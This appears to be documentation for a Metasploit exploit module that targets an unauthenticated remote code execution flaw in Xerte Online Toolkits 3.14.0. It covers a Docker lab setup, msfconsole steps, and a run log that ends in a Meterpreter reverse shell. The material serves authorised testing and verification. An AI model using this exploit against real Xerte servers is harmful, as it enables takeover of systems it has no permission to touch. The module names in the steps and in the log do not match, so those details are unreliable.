## Vulnerable Application

The vulnerable version of the application can be obtained from [the 3.14.0 release](https://github.com/thexerteproject/xerteonlinetoolkits/releases/tag/v3.14.0). Follow the standard installation process.


## Verification Steps

1. Install the application according to the instructions provided by the Xerte project
  - Configure the values for the database host as defined by your installation (refer to the dockerized lab section)
  - Set the authentication method to "db"
  - Set the admin user/password
  - Ensure you can log in to the application before proceeding. It is recommended to create a normal user account as well (under the "users" tab of management.php)
  - Log in as the normal user as well. Optionally, create a new project.
2. Start msfconsole
3. Do: `use use exploit/multi/http/xerte_unauthenticated_importLanguage`
4. Set the host, port, and target path
5. Do: `run`
6. You should get a shell.

### Dockerized lab

The application can be deployed using the following docker container and compose file, as well as the database.php contents.
The line starting with `COPY --chown=www-data:www-data xerteonlinetoolkits` - this directory is expected to be the source downloaded from the Xerte project. The name will vary depending on whether it was obtained with `git clone`, from the GitHub releases, or from the Xerte project directly. After you do this, you'll need to walk through each step of the normal installation and configuration process.

Note that the application will create the database tables as part of the setup. Use the name of your database container when the installer asks. Confirm this with `docker ps`. The database root user password should be what is configured in the docker-compose.yml file.

Dockerfile:

```
FROM php:8.2-apache
WORKDIR /var/www/html
RUN docker-php-ext-install pdo_mysql 
RUN apt-get update && apt-get install -y \
        libxml2-dev  
RUN docker-php-ext-install xml
RUN apt-get update && apt-get install -y libzip-dev
RUN docker-php-ext-install  zip
RUN a2enmod php
RUN a2enmod rewrite
RUN mkdir /var/www/html/xerteonlinetoolkits
RUN chown www-data:www-data /var/www/html/xerteonlinetoolkits
RUN chown -R www-data:www-data /var/www/html/xerteonlinetoolkits/
COPY --chown=www-data:www-data xerteonlinetoolkits /var/www/html/xerteonlinetoolkits
```

docker-compose.yml:

```
version: '3.8'

services:
  web:
    build: .
    image: my_app:latest # Or nginx with php-fpm
    volumes:
      - html:/var/www/html/ # Mount your website files
    ports:
      - "8180:80"
    depends_on:
      - db
  db:
    image: mysql:8.0 # Or mariadb
    environment:
      MYSQL_ROOT_PASSWORD: your_root_password
      MYSQL_DATABASE: your_database_name
    volumes:
      - db_data:/var/lib/mysql # Persist database data
  phpmyadmin:
    image: phpmyadmin/phpmyadmin
    environment:
      PMA_HOST: db # Connects to the 'db' service
      MYSQL_ROOT_PASSWORD: your_root_password
    ports:
      - "8080:80" # Access phpMyAdmin on port 8080
    depends_on:
      - db

volumes:
  db_data:
  html:
```

## Options

### TARGETURI

The `TARGETURI` option defaults to  `/xerteonlinetoolkits`. This is simply the path that the application is installed at.

## Scenarios

The `php/meterpreter/reverse_tcp` works well.

```
use exploit/multi/http/xerte_unauthenticated_template_import_rce
msf exploit(multi/http/xerte_unauthenticated_template_import_rce) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf exploit(multi/http/xerte_unauthenticated_template_import_rce) > set RPORT 8180
RPORT => 8180
msf exploit(multi/http/xerte_unauthenticated_template_import_rce) > run
[*] Started reverse TCP handler on 10.100.5.42:4444 
[*] Uploaded the zip
[*] Found shell at 11
[*] Sending stage (40004 bytes) to 172.18.0.4
[+] Deleted gZJVsJdc.php
[*] Meterpreter session 2 opened (10.100.5.42:4444 -> 172.18.0.4:44354) at 2026-01-20 19:44:15 -0500

```
